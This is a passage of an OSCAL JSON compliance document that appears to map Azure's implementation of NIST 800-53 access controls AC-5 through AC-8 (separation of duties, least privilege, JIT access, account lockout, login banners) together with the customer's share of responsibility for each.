(SDL) process, further detailed in the CM and SA families of controls. Input validation testing includes regulating data inputs by size, formation, and structure prior to allowing information to reach the underlying database. The backend services and servers receive only pre-validated inputs from the front-end webservers. The backend is not directly accessible, from an application data flow perspective, in any other method._x000D_ _x000D_"}],"responsibilities":[{"uuid":"ee395bc7-0182-48f3-8a58-31c31f12cec6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-039"}],"description":"The customer is responsible for separating information flows within customer-deployed resources.","provided-uuid":"72d3e905-efb7-45bf-811e-974c1a68105c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cd4932a5-aa88-411f-8ce7-bfdb1999e427","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-5","statements":[{"uuid":"52a98c5a-9ea1-46fa-9508-91afea0a93ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-5_smt.a","by-components":[{"uuid":"0be4ce14-7366-4438-980a-4987f82e0687","export":{"provided":[{"uuid":"ef63e923-8a96-40b1-9443-bcb6fd9ba2da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-040"}],"description":"Azure implements separation of duties and least privilege by assigning service team members the permissions to their service team with additional permissions being granted only if necessary for business reasons. Separation of duties within service teams is based on user access functions and is divided among different roles in an appropriate way, with the use of RBAC in Active Directory. Role separation ensures that operations system administrators cannot modify application code and nonessential personnel are restricted from administrative privileges in the production environment._x000D_ _x000D_ Azure users are assigned to security roles, which have a defined list of available permissions. By default, no accounts have active permissions to the production environment. If an Azure user needs access to the production environment to perform a specific action, they request temporary Just in Time (JIT) access through the JIT portal. Approval is granted either automatically using preconfigured rules or a different Azure user with the access approver role reviews and approves or denies the type of access requested. Access is only provided for a finite time based on the expected duration of the work to be performed. If access is approved, the user is assigned the minimum permissions required to perform the work, and permission is automatically revoked at the end of the specified time. Implementing access control using JIT access via the JIT portal effectively prevents malevolent activity without collusion, as an individual must review and approve the requestor's access request and denies requests that violate separation of duties requirements. Regardless of JIT access, reviews of accounts and all approved access occur quarterly through the Quarterly Access Review (QAR)._x000D_ _x000D_ Emergency access accounts have persistent administrative access, but generate Severity 2 incident tickets when accessed, ensuring that separation of duties is maintained due to the requirement to investigate each use. Exceptions to the JIT and emergency access account procedures are required to be approved prior to being created and utilized on the production network. This small number of accounts has persistent administrative access to the production environment but must follow all account management requirements before being approved and are monitored closely._x000D_ _x000D_ Azure also establishes separation of duties on critical functions within the Azure production environment to minimize the risk of unauthorized changes to production systems. This is accomplished by separating the responsibilities for requesting, approving, and deploying changes to authorized Azure teams and personnel. Development and testing responsibilities for new software builds or changes to existing software are separated and managed through restricted access to branches within Git and segregated in the development and production environments. Features and changes are developed by the Azure service teams and are reviewed and tested by designated service team members for quality assurance and compatibility with the rest of the platform._x000D_ _x000D_"}],"responsibilities":[{"uuid":"cb96f91f-8a07-406b-90fd-c6b97d86ab04","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-040"}],"description":"The customer is responsible for the separation of duties across customer-controlled accounts.","provided-uuid":"ef63e923-8a96-40b1-9443-bcb6fd9ba2da"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"99edf9d3-50a1-4d72-a8c6-ddc40917c4bd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-5_smt.b","by-components":[{"uuid":"f30dca04-8d4a-4cf3-8b0b-b783c2d6c666","export":{"provided":[{"uuid":"54804ab6-fa16-435d-bc0b-029b966e7817","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-041"}],"description":"Azure documents separation of duties in the Azure Access Control SOP, the Azure Software Change and Release Management SOP, and Azure Hardware Change and Release Management SOP. Separation of duties is also enforced and documented via standard account approvals, JIT approvals, emergency access account incident tickets, and exception requests._x000D_ _x000D_"}],"responsibilities":[{"uuid":"42ea6343-3f89-468f-a3c4-2edcf8a5f192","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-041"}],"description":"The customer is responsible for documenting the separation of duties across customer-controlled accounts.","provided-uuid":"54804ab6-fa16-435d-bc0b-029b966e7817"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"aaf4cf4e-3db9-42b5-9557-c19ff170bcff","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6","statements":[{"uuid":"b2f0fbd5-5b57-4d15-9742-8df50426f629","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6_smt","by-components":[{"uuid":"0efeae4d-d478-443c-aaf9-54384d92b3c7","export":{"provided":[{"uuid":"69f1baf7-f09d-4bbb-b201-43c32333d952","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-042"}],"description":"Privileges to Azure production systems and administrative interfaces are assigned to Azure personnel based on least privilege principles in accordance with job responsibilities. Elevated access must be approved by the respective account managers._x000D_ _x000D_ OneIdentityand MyAccess, used for access provisioning to resources, are based on structured business resources/rules created by the Azure service teams. They are used to grant Azure personnel access to designated and restricted security groups on least privilege principles. Service teams can obtain Just in Time (JIT) for troubleshooting purposes. JIT access is provided though the JIT portal based on the workflow configured and the access is granted only to the requested assets. The access can be configured to support business needs and can range from one (1) hour to seven (7) days and revoked based on the JIT policy settings prescribed by the resource owner. Emergency access accounts are provided the minimum permissions necessary to execute work if JIT is nonfunctioning._x000D_ _x000D_ Access to Azure systems is granted based upon need-to-know and least-privilege principles. Access that has not been explicitly permitted is denied by default. Role-based access controls are used to allocate logical access to a specific job function or area of responsibility, rather than to an individual._x000D_ _x000D_"}],"responsibilities":[{"uuid":"af64e2e5-7b57-4483-884d-3d81128d0301","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-042"}],"description":"The customer is responsible for enforcing least privilege across customer-controlled accounts.","provided-uuid":"69f1baf7-f09d-4bbb-b201-43c32333d952"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2d904b07-ff0f-4431-92e2-e02bf3a45330","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.1","statements":[{"uuid":"e1839a48-e4a8-44a9-b8bc-0441770a8715","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.1_smt","by-components":[{"uuid":"101535c6-5729-4693-8ad9-0f14ac2c2f0b","export":{"provided":[{"uuid":"e1cc1e02-a1b5-45f4-9170-f431585aa3e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-043"}],"description":"For all Azure assets, logical access is explicitly authorized. Azure requires explicit authorization before granting access to Azure, including but not limited to any of the following security functions: establishing system accounts; configuring access authorizations; authentication; setting events to be audited; and system and security administration access to log data. OneIdentityand MyAccess are used to document authorization to Azure resources based on structured business rules using designated and restricted security groups that prescribe which Azure components a user can access._x000D_ _x000D_"}],"responsibilities":[{"uuid":"09691e6c-fc99-44a6-980a-b1950795a89c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-043"}],"description":"The customer is responsible for authorizing access to security functions for customer-controlled accounts.","provided-uuid":"e1cc1e02-a1b5-45f4-9170-f431585aa3e0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ae8d51cd-b019-4065-828e-c26228ae9ea4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.2","statements":[{"uuid":"bc70a8bf-8325-44ad-b47b-0f182544c457","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-044"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.2_smt","by-components":[{"uuid":"8cb3a4bc-757f-43c5-b981-49faed446a8b","export":{"provided":[{"uuid":"1255af29-d960-43c6-846d-3439713ddcf1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-044"}],"description":"Azure personnel do not have persistent elevated access by default to the Azure production environment. Azure requires users to use their accounts for specific job functions that require the appropriate level of access needed. Elevated access is used only for those specified job functions required by the user's responsibilities; temporary elevated access is granted through JIT based on a valid business justification. Persistent elevated access in the form of emergency access accounts are not permitted to be used except for management and operation of the system. In addition, no unprivileged actions such as use of web browsers, email clients, etc., are allowed within the production environment._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3ed7e8f4-7375-4baa-9939-3c0be1ea53cf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-044"}],"description":"The customer is responsible for requiring the use of non-privileged accounts/roles when accessing non-security functions for customer-deployed resources.","provided-uuid":"1255af29-d960-43c6-846d-3439713ddcf1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cd0f297a-526c-423c-8ec7-4e3cd54672b5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.3","statements":[{"uuid":"d1050dc4-b079-4c97-b085-0e5cb95ff96e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-045"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.3_smt","by-components":[{"uuid":"80f9d64a-841e-4a5d-911c-d3572237bd0e","export":{"provided":[{"uuid":"4d470c51-2233-4a59-ac38-4c95e0903b16","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-045"}],"description":"Azure establishes conditions for system account group membership using Active Directory. All group membership for Azure systems must be approved by the respective security group owner. Users are not granted membership to account groups for which they do not require access. Following the least privilege principle, group membership is given with the minimum access needed by the authorized individual to perform his or her job function and role._x000D_ _x000D_ Elevated commands can only be executed by administrative accounts, which are either compliant with JIT and emergency access accounts and must be authorized and approved prior to or upon use, or are exception accounts that must be approved formally to maintain persistent administrative access._x000D_ _x000D_"}],"responsibilities":[{"uuid":"dd6c90b0-5c57-4f03-9fff-c243566b0c93","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-045"}],"description":"The customer is responsible for enforcing least privilege when authorizing network access to privileged commands for customer-deployed resources, rationale for such authorizations should be documented in the system security plan (SSP).","provided-uuid":"4d470c51-2233-4a59-ac38-4c95e0903b16"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b238947b-226b-4cbf-b635-fec887c5bd02","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.5","statements":[{"uuid":"80f1b443-9de0-4fd2-8807-d5464d16d3a4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-046"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.5_smt","by-components":[{"uuid":"bfa8004a-df65-4656-b880-8833c0d7d0bd","export":{"provided":[{"uuid":"f3e9795d-b774-46b6-836f-8e657c5ac08b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-046"}],"description":"Azure restricts elevated access via the OneIdentity groups to which a user belongs. These groups determine which assets the user is able to reach via elevated access._x000D_ _x000D_"}],"responsibilities":[{"uuid":"85d17628-b9e3-46db-9d84-e85835fc8dc2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-046"}],"description":"The customer is responsible for restricting privileged customer-controlled accounts.","provided-uuid":"f3e9795d-b774-46b6-836f-8e657c5ac08b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ac305964-868e-42a2-96a9-effdd2adcf94","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.7","statements":[{"uuid":"0dd4c515-315e-4cde-9677-9c0a597191f1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-047"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.7_smt.a","by-components":[{"uuid":"0677fdb3-51f4-45c3-b737-c63c233cf25a","export":{"provided":[{"uuid":"1ac20e02-c1d2-41e5-b385-07b7dded1185","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-047"}],"description":"Azure Security generates reports containing user privilege assignments to each service team at least quarterly. Service teams use this report to review user privileges for the various users and roles administering the service and validate the need for the assigned privileges._x000D_ _x000D_"}],"responsibilities":[{"uuid":"d683ea66-e2ed-44b1-8d4d-3caad3fb07de","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-047"}],"description":"The customer is responsible for reviewing user privileges of customer-controlled accounts.","provided-uuid":"1ac20e02-c1d2-41e5-b385-07b7dded1185"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"11336932-b9bc-4cf4-94ab-cbec38d0c1cb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-048"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.7_smt.b","by-components":[{"uuid":"19bc0ec8-4a7b-4fbc-a21c-c901f29d8714","export":{"provided":[{"uuid":"25d7e9ef-35aa-416c-91f2-e623f27ecbcb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-048"}],"description":"Any user who no longer is in a role that requires access is removed as part of the review process, either by the manager identifying it as not required or due to lack of response from the manager._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7b1e3d90-0813-4142-83f3-c7f5fd26f1ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-048"}],"description":"The customer is responsible for reassigning or removing privileges for customer-controlled accounts when appropriate.","provided-uuid":"25d7e9ef-35aa-416c-91f2-e623f27ecbcb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6aa17696-6922-4569-9e90-36c74c1647b4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.8","statements":[{"uuid":"4ec5a6b9-1a1b-4182-8cc2-ea81e2ee2fea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-049"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.8_smt","by-components":[{"uuid":"7ccce094-7c84-4a0a-a0d0-53c766901c4c","export":{"provided":[{"uuid":"de355561-6db0-418a-a397-7cc89508d398","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-049"}],"description":"Software execution at a higher privilege level than users executing the software is not possible for servers and network devices. Azure only permits administrator access to server who by default have code execution privileges. These users have full access to the system, preventing users being indirectly provided greater privileges than assigned by Microsoft._x000D_ _x000D_"}],"responsibilities":[{"uuid":"b8969591-bed8-4191-a907-744fc23d0bf3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-049"}],"description":"The customer is responsible for enforcing software execution privileges on customer-deployed resources.","provided-uuid":"de355561-6db0-418a-a397-7cc89508d398"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"28749cf2-2d68-4210-9455-5fb22a4c4723","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.9","statements":[{"uuid":"b5be53a2-6c4d-4249-a240-1091678ebfb6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-050"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.9_smt","by-components":[{"uuid":"c1903093-4a63-4ff5-a843-7488ed28e12b","export":{"provided":[{"uuid":"03728e1f-2869-4122-86d9-47716f3dd08e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-050"}],"description":"Azure captures the execution of privileged functions that are useful in monitoring and investigation of elevated access. These logs are evaluated and required by the service teams and/or Security Response Team for inclusion as reasonable data for analysis._x000D_ _x000D_"}],"responsibilities":[{"uuid":"ce296dc8-25bf-47bf-aff5-9ba103354ae0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-050"}],"description":"The customer is responsible for auditing the execution of privileged functions on customer-deployed resources.","provided-uuid":"03728e1f-2869-4122-86d9-47716f3dd08e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b42e4519-b0ee-447b-82e9-d7285b03bb86","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.10","statements":[{"uuid":"503d849e-9cf9-4163-99b7-4bfd0330f93e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-051"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.10_smt","by-components":[{"uuid":"b6e3b1c4-0ad6-4095-9357-ffd487c0cdf8","export":{"provided":[{"uuid":"49f937f7-1dc4-436d-ba0c-8294d8cdf44b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-051"}],"description":"Azure prevents non-privileged users from accessing elevated functions. Non-privileged service team users are never granted access to Azure. Customers do not have access to any functionality related to Azure safeguards/countermeasures._x000D_ _x000D_"}],"responsibilities":[{"uuid":"1acad121-5677-46ea-a8a8-021bb1e4055a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-051"}],"description":"The customer is responsible for ensuring that non-privileged users cannot execute privileged functions on customer-deployed resources.","provided-uuid":"49f937f7-1dc4-436d-ba0c-8294d8cdf44b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"63277181-b544-4f98-8cc0-52a62aeaa02f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-7","statements":[{"uuid":"cebbe89a-f749-4634-a910-0f02a7182b07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-052"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-7_smt.a","by-components":[{"uuid":"a049a3a2-43be-453d-a120-9cfeae65711a","export":{"provided":[{"uuid":"ebd7d944-7df1-4f01-a29f-5e5a1c4ece16","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-052"}],"description":"For all access to the environment, Azure personnel must use multifactor authentication using a smart card and PIN. smart card authentication enforces lockout after five (5) failed login attempts. After five (5) invalid access attempts within fifteen (15) minutes, a user's smart card is locked out until it is unblocked by an administrator. The smart card is tied to the user's Microsoft Entra ID (formerly AAD)account, using the CorpNet-alias-derived unique identifier for the environment, which is used for access throughout Azure via single-sign-on. Local account settings inherit the smart card settings, ensuring that after five invalid PIN entries, the user's smart card is locked, rather than any accounts they may be logging into - ensuring that their access remains locked until their smart card is unlocked by an administrator."}],"responsibilities":[{"uuid":"4b7deb11-c7f2-4798-a08d-914310ecf035","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-052"}],"description":"The customer is responsible for enforcing a limit of consecutive failed login attempts on customer-deployed resources.","provided-uuid":"ebd7d944-7df1-4f01-a29f-5e5a1c4ece16"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"854eae55-873c-4ad3-8d6e-d3bf4e075b1e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-053"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-7_smt.b","by-components":[{"uuid":"1c75fac5-1c7b-4c73-be89-e947bb63452d","export":{"provided":[{"uuid":"001fd218-4263-47ff-9821-4d2a1db71e62","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-053"}],"description":"For all access to the environment, Azure personnel must use multifactor authentication using a smart card and PIN. Once a user's smart card is locked out after five (5) invalid access attempts against the smart card, the user must contact an administrator through the help desk to manually unblock and reset the PIN."}],"responsibilities":[{"uuid":"b7ddacd6-5a54-4095-a0bd-6794c3ff291c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-053"}],"description":"The customer is responsible for taking action when a user has reached the number of failed login attempts within the time period documented in AC-07 Part a.","provided-uuid":"001fd218-4263-47ff-9821-4d2a1db71e62"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6560a443-c1ee-48fe-9061-41e34ba31121","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-8","statements":[{"uuid":"2cf257bb-89d1-4f6a-bb7e-a81b18f345cf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-054"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-8_smt.a","by-components":[{"uuid":"5b651ac2-ab88-4732-b0bf-863cbcd90f6c","export":{"provided":[{"uuid":"44ed23ad-1ed4-4ca8-8bb7-628bdad163b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-054"}],"description":"All access methods into the Azure production environment include a warning banner prior to administrative login to all servers and network devices. There are two approved messages reviewed by Microsoft Corporate, External, and Legal Affairs (CELA). The first states:_x000D_ _x000D_ \"You are accessing an information system that may contain U.S. Government data. System usage may be monitored, recorded, and subject to audit. Unauthorized use of the system is prohibited and may be subject to criminal and civil penalties. Use of the system indicates consent to monitoring and recording. Administrative personnel remotely accessing the Azure environment:_x000D_ _x000D_ * Maintain their remote computer in a secure manner, in accordance with organizational security policies and procedures as defined in Microsoft Remote Connectivity Security Policies._x000D_ * Only access the Azure environment in execution of operational, deployment, and support responsibilities using only administrative applications or tools directly related to performing these responsibilities._x000D_ * Are advised to not knowingly store, transfer into, or process in the Azure environment data exceeding a FIPS 199 High security categorization (FISMA Controlled Unclassified Information).\"_x000D_ _x000D_ An alternate approved wording states:_x000D_ _x000D_ \"You are accessing an information system that may contain U.S. Government data. System usage may be monitored, recorded, and subject to audit. Unauthorized use of the system is prohibited and may be subject to criminal and civil penalties. Use of the system indicates consent to monitoring and recording. Administrative personnel remotely accessing the Azure environment:_x000D_ _x000D_ (1) shall maintain their remote computer in a secure manner, in accordance with organizational security policies and procedures as defined in Microsoft Remote Connectivity Security Policies;_x000D_ _x000D_ (2) shall only access the Azure environment in execution of operational, deployment, and support responsibilities using only administrative applications or tools directly related to performing these responsibilities; and_x000D_ _x000D_ (3) shall not knowingly store, transfer into, or process in the Azure environment data exceeding a FIPS 199 Moderate security categorization (FISMA Controlled Unclassified Information).\"_x000D_ _x000D_ A warning message is also presented to users requesting JIT elevation at the JIT access portal, prior to obtaining elevated permissions. This message states:_x000D_ _x000D_ Warning_x000D_ _x000D_ You are accessing an information system that may contain sensitive data. System usage may be monitored, recorded, and subject to audit. Unauthorized use of the system is prohibited and may be subject to criminal and civil penalties. Use of the system indicates consent to monitoring and recording. Administrative personnel remotely accessing the Azure environment shall maintain their remote computer in a secure manner in accordance with organizational security policies and procedures as defined in the Microsoft Remote Connectivity Security Policies._x000D_ _x000D_"}],"responsibilities":[{"uuid":"03493253-a086-4ca8-a3a2-425723ef8b5f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-054"}],"description":"The customer is responsible for implementing a compliant system use notification for all customer-deployed resources.","provided-uuid":"44ed23ad-1ed4-4ca8-8bb7-628bdad163b5"}]},"description":"See inheritance and customer responsibility 